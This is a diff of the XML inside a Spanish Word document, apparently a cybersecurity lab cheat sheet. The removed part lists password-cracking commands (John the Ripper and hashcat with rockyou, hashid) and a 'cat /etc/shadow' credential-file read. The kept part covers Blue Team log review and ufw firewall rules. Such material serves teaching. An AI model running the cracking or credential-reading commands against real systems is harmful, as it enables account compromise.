-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">41. John the Ripper </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>básico</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>john hash.txt</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="3C9B181A">
-          <v:rect id="_x0000_i1524" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>42. Mostrar resultados</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>john</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> --</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>show</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> hash.txt</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="24F88440">
-          <v:rect id="_x0000_i1525" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>43. Usar wordlist</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>john --wordlist=rockyou.txt hash.txt</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="6CF646D1">
-          <v:rect id="_x0000_i1526" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">44. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>Descomprimir</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> wordlist</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>gunzip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> rockyou.txt.gz</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="3F07A946">
-          <v:rect id="_x0000_i1527" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>45. Generar hash MD5</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>echo -n "1234" | md5sum</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="23F5CB42">
-          <v:rect id="_x0000_i1528" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>46. SHA256</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>echo -n "1234" | sha256sum</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="27835AE0">
-          <v:rect id="_x0000_i1529" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">47. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>Hashcat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
+        <w:t>🛡️</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> BLOQUE 4: BLUE TEAM (61–80)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict w14:anchorId="77AA3ED5">
+          <v:rect id="_x0000_i1079" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>61. Ver logs</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>cat /var/log/auth.log</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict w14:anchorId="59396990">
+          <v:rect id="_x0000_i1080" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>62. Buscar intentos fallidos</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>grep "Failed password" /var/log/auth.log</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict w14:anchorId="0A93A0A4">
+          <v:rect id="_x0000_i1081" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>63. Ver conexiones</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>ss -tunap</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict w14:anchorId="5C86798F">
+          <v:rect id="_x0000_i1082" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>64. Instalar firewall</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>sudo apt install ufw</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict w14:anchorId="2DF255D1">
+          <v:rect id="_x0000_i1083" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>65. Activar firewall</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>sudo ufw enable</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict w14:anchorId="44D2F7DC">
+          <v:rect id="_x0000_i1084" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>hashcat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -m 0 hash.txt rockyou.txt</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="75420A2E">
-          <v:rect id="_x0000_i1530" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>48. Tipos de hash</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hashid</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> hash.txt</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="018D7981">
-          <v:rect id="_x0000_i1531" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">49. Crear </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>usuario</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> vulnerable</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>useradd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> test</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>passwd test</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="2B7B07D5">
-          <v:rect id="_x0000_i1532" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>50. Ver hashes</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>shadow</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="29E8322D">
-          <v:rect id="_x0000_i1533" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>51–60 (resumen rápido)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">uso de </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hydra</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>ataques SSH</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>diccionario</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>fuerza bruta web</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>hash cracking avanzado</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">(Si quieres, te desarrollo estos con herramientas concretas tipo Hydra, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Burp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, etc.)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="4BD9A560">
-          <v:rect id="_x0000_i1534" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Ttulo1"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
-        </w:rPr>
-        <w:t>🛡️</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> BLOQUE 4: BLUE TEAM (61–80)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="77AA3ED5">
-          <v:rect id="_x0000_i1535" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>61. Ver logs</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>var</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/log/auth.log</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="59396990">
-          <v:rect id="_x0000_i1536" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>62. Buscar intentos fallidos</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>grep "</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Failed</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>password</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>" /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>var</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/log/auth.log</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:pict w14:anchorId="0A93A0A4">
-          <v:rect id="_x0000_i1537" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>63. Ver conexiones</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ss</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tunap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="5C86798F">
-          <v:rect id="_x0000_i1538" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">64. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>Instalar</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> firewall</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> apt install </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>ufw</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="2DF255D1">
-          <v:rect id="_x0000_i1539" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>65. Activar firewall</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">sudo </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ufw</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>enable</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="44D2F7DC">
-          <v:rect id="_x0000_i1540" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
         <w:t>66. Permitir SSH</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">sudo </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ufw</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>allow</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 22</w:t>
+        <w:t>sudo ufw allow 22</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="6C7B90F4">
-          <v:rect id="_x0000_i1541" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1085" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -2625,29 +2875,13 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">sudo </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ufw</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>deny</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 23</w:t>
+        <w:t>sudo ufw deny 23</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="5B74DF45">
-          <v:rect id="_x0000_i1542" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1086" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -2668,26 +2902,13 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">sudo </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ufw</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>status</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>sudo ufw status</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="2DA63302">
-          <v:rect id="_x0000_i1543" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1087" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -2714,7 +2935,7 @@
     <w:p>
       <w:r>
         <w:pict w14:anchorId="5BFF9E81">
-          <v:rect id="_x0000_i1544" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1088" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
